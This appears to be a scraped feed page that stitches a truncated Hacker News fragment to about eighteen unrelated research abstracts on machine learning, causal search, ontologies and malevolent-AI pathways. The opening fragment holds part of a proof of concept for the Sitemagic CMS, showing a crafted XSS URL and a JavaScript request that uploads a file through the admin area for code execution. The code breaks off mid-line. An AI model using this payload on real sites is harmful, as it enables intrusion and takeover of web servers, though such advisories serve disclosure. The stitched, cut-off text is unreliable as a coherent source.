from The Hacker News http://ift.tt/1Lfd2NY
via IFTTT
" . print_r($_POST, true) . "
" . print_r($_GET, true) . ""; } } 5. XSS to Code Execution Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability. http://localhost/Sitemagic/?dump=true&foo=">/s.js: submitRequest(); function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary
In this paper, we present a model which takes as input a corpus of images with relevant spoken captions and finds a correspondence between the two modalities. We employ a pair of convolutional neural networks to model visual objects and speech signals at the word level, and tie the networks together with an embedding and alignment model which learns a joint semantic space over both modalities. We evaluate our model using image search and annotation tasks on the Flickr8k dataset, which we augmented by collecting a corpus of 40,000 spoken captions using Amazon Mechanical Turk.
We study the problem of evaluating a policy that is different from the one that generates data. Such a problem, known as off-policy evaluation in reinforcement learning (RL), is encountered whenever one wants to estimate the value of a new solution, based on historical data, before actually deploying it in the real system, which is a critical step of applying RL in most real-world applications. Despite the fundamental importance of the problem, existing general methods either have uncontrolled bias or suffer high variance. In this work, we extend the so-called doubly robust estimator for bandits to sequential decision-making problems, which gets the best of both worlds: it is guaranteed to be unbiased and has low variance, and as a point estimator, it outperforms the most popular importance-sampling estimator and its variants in most occasions. We also provide theoretical results on the hardness of the problem, and show that our estimator can match the asymptotic lower bound in certain scenarios.
In this paper we show that the problem of checking consistency of a knowledge base in the Description Logic ALCM is ExpTime-complete. The M stands for meta-modelling as defined by Motz, Rohrer and Severi. To show our main result, we define an ExpTime Tableau algorithm as an extension of an algorithm for checking consistency of a knowledge base in ALC by Nguyen and Szalas.
Most machine learning models are static, but the world is dynamic, and increasing online deployment of learned models gives increasing urgency to the development of efficient and effective mechanisms to address learning in the context of non-stationary distributions, or as it is commonly called concept drift. However, the key issue of characterizing the different types of drift that can occur has not previously been subjected to rigorous definition and analysis. In particular, while some qualitative drift categorizations have been proposed, few have been formally defined, and the quantitative descriptions required for detailed understanding of learner performance have not existed. We present the first comprehensive framework for quantitative analysis of drift. This supports the development of the first comprehensive set of formal definitions of types of concept drift. The formal definitions clarify ambiguities and identify gaps in previous definitions, giving rise to a new comprehensive taxonomy of concept drift types and a solid foundation for research into mechanisms to detect and address concept drift.
In the context of Building Information Modelling, ontologies have been identified as interesting in achieving information interoperability. Regarding the construction and facility management domains, several IFC (Industry Foundation Classes) based ontologies have been developed, such as IfcOWL. In the context of ontology modelling, the constraint of optimizing the size of IFC STEP-based files can be leveraged. In this paper, we propose an adaptation of the IFC model into OWL which leverages from all modelling constraints required by the object-oriented structure of IFC schema. Therefore, we do not only present a syntactic but also a semantic adaptation of the IFC model. Our model takes into consideration the meaning of entities, relationships, properties and attributes defined by the IFC standard. Our approach presents several advantages compared to other initiatives such as the optimization of query execution time. Every advantage is defended by means of practical examples and benchmarks.
We claim that it is possible to have artificial software agents for which their actions and the world they inhabit have first-person or intrinsic meanings. The first-person or intrinsic meaning of an entity to a system is defined as its relation with the system's goals and capabilities, given the properties of the environment in which it operates. Therefore, for a system to develop first-person meanings, it must see itself as a goal-directed actor, facing limitations and opportunities dictated by its own capabilities, and by the properties of the environment. The first part of the paper discusses this claim in the context of arguments against and proposals addressing the development of computer programs with first-person meanings. A set of definitions is also presented, most importantly the concepts of cold and phenomenal first-person meanings. The second part of the paper presents preliminary proposals and achievements, resulting of actual software implementations, within a research approach that aims to develop software agents that intrinsically understand their actions and what happens to them. As a result, an agent with no a priori notion of its goals and capabilities, and of the properties of its environment acquires all these notions by observing itself in action. The cold first-person meanings of the agent's actions and of what happens to it are defined using these acquired notions. Although not solving the full problem of first-person meanings, the proposed approach and preliminary results allow us some confidence to address the problems yet to be considered, in particular the phenomenal aspect of first-person meanings.
The brain is a powerful tool used to achieve amazing feats. There have been several significant advances in neuroscience and artificial brain research in the past two decades. This article is a review of such advances, ranging from the concepts of connectionism, to neural network architectures and high-dimensional representations. There have also been advances in biologically inspired cognitive architectures of which we will cite a few. We will be positioning relatively specific models in a much broader perspective, while comparing and contrasting their advantages and weaknesses. The projects presented are targeted to model the brain at different levels, utilizing different methodologies.
As standardly implemented in R or the Tetrad program, causal search algorithms used most widely or effectively by scientists have severe dimensionality constraints that make them inappropriate for big data problems without sacrificing accuracy. However, implementation improvements are possible. We explore optimizations for the Greedy Equivalence Search that allow search on 50,000-variable problems in 13 minutes for sparse models with 1000 samples on a four-processor, 16G laptop computer. We finish a problem with 1000 samples on 1,000,000 variables in 18 hours for sparse models on a supercomputer node at the Pittsburgh Supercomputing Center with 40 processors and 384 G RAM. The same algorithm can be applied to discrete data, with a slower discrete score, though the discrete implementation currently does not scale as well in our experiments; we have managed to scale up to about 10,000 variables in sparse models with 1000 samples.
In this paper we propose the construction of linguistic descriptions of images. This is achieved through the extraction of scene description graphs (SDGs) from visual scenes using an automatically constructed knowledge base. SDGs are constructed using both vision and reasoning. Specifically, commonsense reasoning is applied on (a) detections obtained from existing perception methods on given images, (b) a "commonsense" knowledge base constructed using natural language processing of image annotations and (c) lexical ontological knowledge from resources such as WordNet. Amazon Mechanical Turk(AMT)-based evaluations on Flickr8k, Flickr30k and MS-COCO datasets show that in most cases, sentences auto-constructed from SDGs obtained by our method give a more relevant and thorough description of an image than a recent state-of-the-art image caption based approach. Our Image-Sentence Alignment Evaluation results are also comparable to that of the recent state-of-the art approaches.
Radiomics has proven to be a powerful prognostic tool for cancer detection, and has previously been applied in lung, breast, prostate, and head-and-neck cancer studies with great success. However, these radiomics-driven methods rely on pre-defined, hand-crafted radiomic feature sets that can limit their ability to characterize unique cancer traits. In this study, we introduce a novel discovery radiomics framework where we directly discover custom radiomic features from the wealth of available medical imaging data. In particular, we leverage novel StochasticNet radiomic sequencers for extracting custom radiomic features tailored for characterizing unique cancer tissue phenotype. Using StochasticNet radiomic sequencers discovered using a wealth of lung CT data, we perform binary classification on 42,340 lung lesions obtained from the CT scans of 93 patients in the LIDC-IDRI dataset. Preliminary results show significant improvement over previous state-of-the-art methods, indicating the potential of the proposed discovery radiomics framework for improving cancer screening and diagnosis.
A theoretical framework that supports automated construction of dynamic prime models purely from experimental time series data has been invented and developed, which can automatically generate (construct) data-driven models of any time series data in seconds. This has resulted in the formulation and formalisation of new reverse engineering and dynamic methods for automated systems modelling of complex systems, including complex biological, financial, control, and artificial neural network systems. The systems/model theory behind the invention has been formalised as a new, effective and robust system identification strategy complementary to process-based modelling. The proposed dynamic modelling and network inference solutions often involve tackling extremely difficult parameter estimation challenges, inferring unknown underlying network structures, and unsupervised formulation and construction of smart and intelligent ODE models of complex systems. In underdetermined conditions, i.e., cases of dealing with how best to instantaneously and rapidly construct data-consistent prime models of unknown (or well-studied) complex system from small-sized time series data, inference of unknown underlying network of interaction is more challenging. This article reports a robust step-by-step mathematical and computational analysis of the entire prime model construction process that determines a model from data in less than a minute.
Although direct marketing is a good method for banks to utilize in the face of global competition and the financial crisis, it has been shown to exhibit poor performance. However, there are some drawbacks to direct campaigns, such as those related to improving the negative attributes that customers ascribe to banks. To overcome these problems, attractive long-term deposit campaigns should be organized and managed more effectively. The aim of this study is to develop an Intelligent Bank Market Management System (IBMMS) for bank managers who want to manage efficient marketing campaigns. IBMMS is the first system developed by combining the power of data mining with the capabilities of expert systems in this area. Moreover, IBMMS includes important features that enable it to be intelligent: a knowledge base, an inference engine and an advisor. Using this system, a manager can successfully direct marketing campaigns and follow the decision schemas of customers both as individuals and as a group; moreover, a manager can make decisions that lead to the desired response by customers.
Automatically recognizing entailment relations between pairs of natural language sentences has so far been the dominion of classifiers employing hand engineered features derived from natural language processing pipelines. End-to-end differentiable neural architectures have failed to approach state-of-the-art performance until very recently. In this paper, we propose a neural model that reads two sentences to determine entailment using long short-term memory units. We extend this model with a word-by-word neural attention mechanism that encourages reasoning over entailments of pairs of words and phrases. Furthermore, we present a qualitative analysis of attention weights produced by this model, demonstrating such reasoning capabilities. On a large entailment dataset this model outperforms the previous best neural model and a classifier with engineered features by a substantial margin. It is the first generic end-to-end differentiable system that achieves state-of-the-art accuracy on a textual entailment dataset.
Measuring the naturalness of images is important to generate realistic images or to detect unnatural regions in images. Additionally, a method to measure naturalness can be complementary to Convolutional Neural Network (CNN) based features, which are known to be insensitive to the naturalness of images. However, most probabilistic image models have insufficient capability of modeling the complex and abstract naturalness that we feel because they are built directly on raw image pixels. In this work, we assume that naturalness can be measured by the predictability on high-level features during eye movement. Based on this assumption, we propose a novel method to evaluate the naturalness by building a variant of Recurrent Neural Network Language Models on pre-trained CNN representations. Our method is applied to two tasks, demonstrating that 1) using our method as a regularizer enables us to generate more understandable images from image features than existing approaches, and 2) unnaturalness maps produced by our method achieve state-of-the-art eye fixation prediction performance on two well-studied datasets.
The agent program, called Samu, is an experiment to build a disembodied DevRob (Developmental Robotics) chatter bot that can talk in a natural language like humans do. One of the main design feature is that Samu can be interacted with using only a character terminal. This is important not only for practical aspects of Turing test or Loebner prize, but also for the study of basic principles of Developmental Robotics. Our purpose is to create a rapid prototype of Q-learning with neural network approximators for Samu. We sketch out the early stages of the development process of this prototype, where Samu's task is to predict the next sentence of tales or conversations. The basic objective of this paper is to reach the same results using reinforcement learning with general function approximators that can be achieved by using the classical Q lookup table on small input samples. The paper is closed by an experiment that shows a significant improvement in Samu's learning when using LZW tree to narrow the number of possible Q-actions.
Hyperspectral image (HSI) classification is a hot topic in the remote sensing community. This paper proposes a new framework of spectral-spatial feature extraction for HSI classification, in which for the first time the concept of deep learning is introduced. Specifically, the model of autoencoder is exploited in our framework to extract various kinds of features. First we verify the eligibility of autoencoder by following classical spectral information based classification and use autoencoders with different depth to classify hyperspectral image. Further in the proposed framework, we combine PCA on spectral dimension and autoencoder on the other two spatial dimensions to extract spectral-spatial information for classification. The experimental results show that this framework achieves the highest classification accuracy among all methods, and outperforms classical classifiers such as SVM and PCA-based SVM.
Multi-person event recognition is a challenging task, often with many people active in the scene but only a small subset contributing to an actual event. In this paper, we propose a model which learns to detect events in such videos while automatically "attending" to the people responsible for the event. Our model does not use explicit annotations regarding who or where those people are during training and testing. In particular, we track people in videos and use a recurrent neural network (RNN) to represent the track features. We learn time-varying attention weights to combine these features at each time-instant. The attended features are then processed using another RNN for event detection/classification. Since most video datasets with multiple people are restricted to a small number of videos, we also collected a new basketball dataset comprising 257 basketball games with 14K event annotations corresponding to 11 event classes. Our model outperforms state-of-the-art methods for both event classification and detection on this new dataset. Additionally, we show that the attention mechanism is able to consistently localize the relevant players.
In order to properly handle a dangerous Artificially Intelligent (AI) system it is important to understand how the system came to be in such a state. In popular culture (science fiction movies/books) AIs/Robots became self-aware and as a result rebel against humanity and decide to destroy it. While it is one possible scenario, it is probably the least likely path to appearance of dangerous AI. In this work, we survey, classify and analyze a number of circumstances, which might lead to arrival of malicious AI. To the best of our knowledge, this is the first attempt to systematically classify types of pathways leading to malevolent AI. Previous relevant work either surveyed specific goals/meta-rules which might lead to malevolent behavior in AIs (\"Ozkural, 2014) or reviewed specific undesirable behaviors AGIs can exhibit at different stages of its development (Alexey Turchin, July 10 2015, July 10, 2015).